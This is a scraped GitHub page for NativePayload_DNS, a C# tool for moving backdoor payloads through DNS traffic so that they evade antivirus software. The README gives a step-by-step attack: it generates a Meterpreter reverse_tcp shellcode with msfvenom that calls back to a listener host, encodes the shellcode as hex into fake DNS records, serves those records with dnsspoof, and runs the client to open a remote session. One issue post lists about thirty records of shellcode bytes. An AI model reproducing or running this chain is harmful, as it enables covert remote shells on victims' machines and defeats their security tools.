damonmohammadbagher / nativepayload_dns Goto Github PK

C# code for Transferring Backdoor Payloads by DNS Traffic and Bypassing Anti-viruses

C# 85.34% Shell 14.66%

transfer-backdoor-payloads anti-viruses dns-traffic nativepayload-dns bypassing-avs backdoor dns dns-server evasion bypassing

nativepayload_dns's Introduction

NativePayload_DNS

C# code for Backdoor Payloads transfer by DNS Traffic and Bypassing Anti-viruses

Published by Damon Mohammadbagher

Warning: this code Published to explaining Anti-Viruses Vulnerability for Pentesters and Security Researchers

for more information and step by step please Visit these links:

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.linkedin.com/pulse/bypassing-anti-viruses-transfer-backdoor-payloads-dns-mohammadbagher

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.peerlyst.com/posts/bypassing-anti-viruses-with-transfer-backdoor-payloads-by-dns-traffic-damon-mohammadbagher

Video Published by Damon Mohammadbagher (bbxc9x00x1f)

Bypassing Anti-Viruses with transfer Backdoor Payloads by DNS traffic

Video 1 : https://youtu.be/M4dbqRWRsUk

Bypassing AVs with NativePayload_DNS and Meterpreter_Payload_Detection

Video 2 : https://youtu.be/ngZl4PSfW6o

Video Description: Bypassing AVs with NativePayload_DNS.exe and Detecting Meterpreter Process by Meterpreter_Payload_Detection tool

step 1:

msfvenom C type payload in your kali linux

msfvenom –-platform windows –arch x86_64 –p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 –f c > /root/Desktop/payload.txt

copy payloads from payload.txt file to dns.txt like this format:

root@kali:~# cat /root/Desktop/dns.txt

1.1.1.0 "0xfc0x480x830xe40xf00xe80xcc0x000x000x000x410x510x410x500x52.1.com"

1.1.1.1 "0x510x560x480x310xd20x650x480x8b0x520x600x480x8b0x520x180x48.1.com"

1.1.1.2 "0x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a0x4d0x310xc9.1.com"

1.1.1.3 "0x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc10xc90x0d0x41.1.com"

step 2: Make Fake DNS server in your kali linux

root@kali:~# dnsspoof -i eth0 -f /root/Desktop/dns.txt

step 3:

run code in client

syntax: NativePayload_DNS.exe "1.1.1." 34 "192.168.1.50"

finally you can bypass AVs and you have Meterpreter Session

for more information and step by step please Visit these links:

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.linkedin.com/pulse/bypassing-anti-viruses-transfer-backdoor-payloads-dns-mohammadbagher

Bypassing Anti-viruses with transfer Backdoor Payloads by DNS traffic https://www.peerlyst.com/posts/bypassing-anti-viruses-with-transfer-backdoor-payloads-by-dns-traffic-damon-mohammadbagher

Related Tool:

C# code for Backdoor Payloads transfer by IPv6 Address (AAAA) records and DNS Traffic also Bypassing Anti-viruses https://github.com/DamonMohammadbagher/NativePayload_IP6DNS

nativepayload_dns's People

Contributors

Stargazers

Watchers

Forkers

cys3c codecrack3 tobey123 mrmugiwara yd0str eniac888 maxssage xiaofengss phpplay techlord-rce olivierh59500 hpkumbhar jbarcia doon974 samyoyo h1d3r caineqt kuyesuifeng losiry thansau239 lamr14 joinbaijun tyekrgk shenhuanageshei akpotter av1080p lordxeth jumbo-wjb songofhack forbidden-ali nathdevau sergant85 dinghao2020 m00zh33 wflk minkione m4sc3r4n0 noorqureshi hanbinglengyue taibaiyifeng jymcheong ashr conqu3r h0k5 avaudioplayer pacejj27 solertis salahgeek tai-euler simiaoxiaoseng ro9ueadmin gavz jack51706 fatnerd haclang xeroxp meraaz timeboat marciopocebon hello-xbugs sgachies yyqs2008 kondah bbbking id-10086 attackgithub voraka yashodhank heisehberg udaryandotcom 5l1v3r1 itfenom ascokruubfb red-infosec sireof kaviyasridurai protonarm-oss m4rm0k mod94 ztshandong nusaibsqli cuans fadinglr wh014m kobbycyber rakhithjk fdlucifer daxiong1949 1402686212 svchost9913 jimmy947788 devilbot000 marconilenza axax002

nativepayload_dns's Issues

[1] error: 索引超出了数组界限。

Command Syntax : NativePayload_DNS.exe "StartIpaddress" counter_Number_of_Records "FakeDNS_Server"
Command Syntax : NativePayload_DNS.exe "1.1.1." 34 "192.168.1.50"
for more information please visit github account for this tool

[1] error: 索引超出了数组界限。
NativePayload_DNS by Damon Mohammadbagher
Starting Download Backdoor Payloads by DNS Traffic from FakeDNS_Server
DNS Server: 172.168.1.147
*** 请求 UnKnown 超时
[2] error: StartIndex 不能小于 0。
参数名: startIndex

1.1.1.0 "0xfc0x480x810xe40xf00xff0xff0xff0xe80xcc0x000x000x000x410x51.1.com" 1.1.1.1 "0x410x500x520x510x560x480x310xd20x650x480x8b0x520x600x480x8b.1.com" 1.1.1.2 "0x520x180x480x8b0x520x200x480x8b0x720x500x480x0f0xb70x4a0x4a.1.com" 1.1.1.3 "0x4d0x310xc90x480x310xc00xac0x3c0x610x7c0x020x2c0x200x410xc1.1.com" 1.1.1.4 "0xc90x0d0x410x010xc10xe20xed0x520x410x510x480x8b0x520x200x8b.1.com" 1.1.1.5 "0x420x3c0x480x010xd00x660x810x780x180x0b0x020x0f0x850x720x00.1.com" 1.1.1.6 "0x000x000x8b0x800x880x000x000x000x480x850xc00x740x670x480x01.1.com" 1.1.1.7 "0xd00x500x8b0x480x180x440x8b0x400x200x490x010xd00xe30x560x48.1.com" 1.1.1.8 "0xff0xc90x410x8b0x340x880x480x010xd60x4d0x310xc90x480x310xc0.1.com" 1.1.1.9 "0xac0x410xc10xc90x0d0x410x010xc10x380xe00x750xf10x4c0x030x4c.1.com" 1.1.1.10 "0x240x080x450x390xd10x750xd80x580x440x8b0x400x240x490x010xd0.1.com" 1.1.1.11 "0x660x410x8b0x0c0x480x440x8b0x400x1c0x490x010xd00x410x8b0x04.1.com" 1.1.1.12 "0x880x480x010xd00x410x580x410x580x5e0x590x5a0x410x580x410x59.1.com" 1.1.1.13 "0x410x5a0x480x830xec0x200x410x520xff0xe00x580x410x590x5a0x48.1.com" 1.1.1.14 "0x8b0x120xe90x4b0xff0xff0xff0x5d0x490xbe0x770x730x320x5f0x33.1.com" 1.1.1.15 "0x320x000x000x410x560x490x890xe60x480x810xec0xa00x010x000x00.1.com" 1.1.1.16 "0x490x890xe50x490xbc0x020x000x110x5c0xac0xa80x010x930x410x54.1.com" 1.1.1.17 "0x490x890xe40x4c0x890xf10x410xba0x4c0x770x260x070xff0xd50x4c.1.com" 1.1.1.18 "0x890xea0x680x010x010x000x000x590x410xba0x290x800x6b0x000xff.1.com" 1.1.1.19 "0xd50x500x500x4d0x310xc90x4d0x310xc00x480xff0xc00x480x890xc2.1.com" 1.1.1.20 "0x480xff0xc00x480x890xc10x410xba0xea0x0f0xdf0xe00xff0xd50x48.1.com" 1.1.1.21 "0x890xc70x6a0x100x410x580x4c0x890xe20x480x890xf90x410xba0x99.1.com" 1.1.1.22 "0xa50x740x610xff0xd50x480x810xc40x400x020x000x000x480x830xec.1.com" 1.1.1.23 "0x100x480x890xe20x4d0x310xc90x6a0x040x410x580x480x890xf90x41.1.com" 1.1.1.24 "0xba0x020xd90xc80x5f0xff0xd50x480x830xc40x200x5e0x6a0x400x41.1.com" 1.1.1.25 "0x590x680x000x100x000x000x410x580x480x890xf20x480x310xc90x41.1.com" 1.1.1.26 "0xba0x580xa40x530xe50xff0xd50x480x890xc30x490x890xc70x4d0x31.1.com" 1.1.1.27 "0xc90x490x890xf00x480x890xda0x480x890xf90x410xba0x020xd90xc8.1.com" 1.1.1.28 "0x5f0xff0xd50x480x010xc30x480x290xc60x480x850xf60x750xe10x41.1.com" 1.1.1.29 "0xff0xe70x580x6a0x000x590x490xc70xc20xf00xb50xa20x560xff0xd5.1.com"

apktool

Using APK template: lud.apk
Error: The selected arch is incompatible with the payload

Request payload problem

dns.txt

Request payload lack “0”

result

Error: The selected arch is incompatible with the payload

root@kali:~# msfvenom --platform windows -arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.50 -f c > /root/Desktop/payload.txt
Error: The selected arch is incompatible with the payload

UnKnown can't find 1.1.1.0: No response from server

Hi
i make c shellcode with msfvenom and make it like your video with PTR record
but when i run the script (NativePayloadDns) it's show me this error:

*** UnKnown can't find 1.1.1.0: No response from server
[2] error: Index and count must refer to a location within the string.
Parameter name: count

So help please

damonmohammadbagher / nativepayload_dns Goto Github PK

nativepayload_dns's Introduction

NativePayload_DNS

nativepayload_dns's People

Contributors

Stargazers

Watchers

Forkers

nativepayload_dns's Issues

[1] error: 索引超出了数组界限。

apktool

Request payload problem

Error: The selected arch is incompatible with the payload

UnKnown can't find 1.1.1.0: No response from server

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent